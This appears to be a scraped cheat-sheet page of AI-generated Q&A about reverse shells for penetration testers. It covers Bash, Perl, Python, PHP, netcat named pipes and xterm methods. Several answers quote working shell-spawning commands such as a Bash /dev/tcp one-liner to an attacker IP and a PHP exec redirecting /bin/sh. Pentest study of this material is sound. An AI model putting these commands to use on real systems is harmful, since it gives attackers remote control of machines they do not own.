Reverse Shell Cheat Sheet for Pentesters
Uploaded by
ds9xmxxj8fReverse Shell Cheat Sheet for Pentesters
Uploaded by
ds9xmxxj8fCommon questions
Powered by AISocket programming is fundamental in creating reverse shells, as it handles network communication between the attacker and target. In Perl, this is achieved with the 'socket', 'connect', and 'sockaddr_in' functions to establish a TCP connection to the attacker's system. Similarly, in Python, the 'socket' library is used to create a socket, set up a connection with 's.connect()', and redirect standard input/output to the socket using 'os.dup2()', facilitating interactive command execution. This network-level manipulation is crucial for interacting over the established channel .
The unique advantage of using an xterm session for reverse shells is its graphical interface capability, allowing interaction beyond text input/output, which is the limit of most TCP-based methods. An xterm session can provide a richer user experience, mimicking an actual terminal session remotely. This approach requires setting up an X-Server and granting appropriate permissions, making it less stealthy but potentially more powerful for advanced navigation and command execution on the target system .
When using Perl for reverse shells, a primary consideration is the balance between feature robustness and script length. A short Perl script, like the one-liner example provided, may lack error handling and additional features necessary for more complex operations. Feature-rich Perl scripts offer these capabilities but can become verbose and less suitable for quick deployments in constrained environments where conciseness and stealth might be priorities .
The options for creating a reverse shell are limited primarily by the scripting languages installed on the target system. This limitation can be addressed by uploading a binary program if possible or utilizing different available scripting options tailored for the specific environment of the target. Each method, such as using Bash, Perl, or Python, comes with specific syntax adaptations, allowing flexibility based on the system's configurations .
The PHP reverse shell script handles file descriptors by assuming that the TCP connection uses file descriptor 3. The command 'exec("/bin/sh -i <&3 >&3 2>&3");' is used to facilitate interaction over the TCP connection. If the script fails, troubleshooting steps involve trying different file descriptors such as 4, 5, or 6 to accommodate variations in the system's TCP handling .
When establishing a reverse shell using an xterm session, 'xhost +targetip' is crucial because it authorizes the target's connection to the attacker's X-Server session. This authorization is necessary to allow the xterm on the target server to connect back to the attacker's machine on TCP port 6001, which enables the attacker to catch the incoming xterm session with their X-Server setup .
The one-liner Bash command 'bash -i >& /dev/tcp/10.0.0.1/8080 0>&1' is simple and direct but relies on specific network capabilities and Bash features that might not always be available. In contrast, the Perl command 'perl -e 'use Socket;$i="10.0.0.1";' is more portable due to Perl's flexibility but may be verbose for simple tasks. Python offers a good balance with its socket and subprocess modules 'python -c 'import socket, subprocess, os;', providing comprehensive scripting capabilities but requiring more dependencies than Bash or Perl. The choice of language often depends on the specific capabilities and constraints of the target system .
When direct access, such as adding a new account or SSH key, is not possible during a penetration test, the recommended approach is to establish a reverse shell. This can be done by leveraging scripting languages installed on the target system to send commands back to the attacker's system. Various one-liner methods are provided for different languages, such as Bash, Perl, Python, PHP, Ruby, and Netcat, each tailored for Unix-like systems but adaptable for Windows with certain modifications .
Netcat is not always reliable on production systems because it is rarely present, and even when available, different versions might lack the '-e' option needed for direct shell execution. With a limited version of Netcat, a reverse shell can still be achieved by creating a named pipe and using netcat to read from and write to this pipe, effectively relaying the shell session. This involves commands like 'mkfifo', 'cat', and 'nc' to facilitate the shell interaction through the named pipe .
Executing reverse shells with Bash, particularly using '>/dev/tcp/host/port', relies on support for TCP and UDP connections via special file descriptors like '/dev/tcp/'. This functionality is not present in all Bash versions and requires network redirection capabilities within the shell's built-in features, which some configurations might disable due to security or compatibility reasons. This reliance means that only certain Bash versions can execute reverse shells in this manner successfully .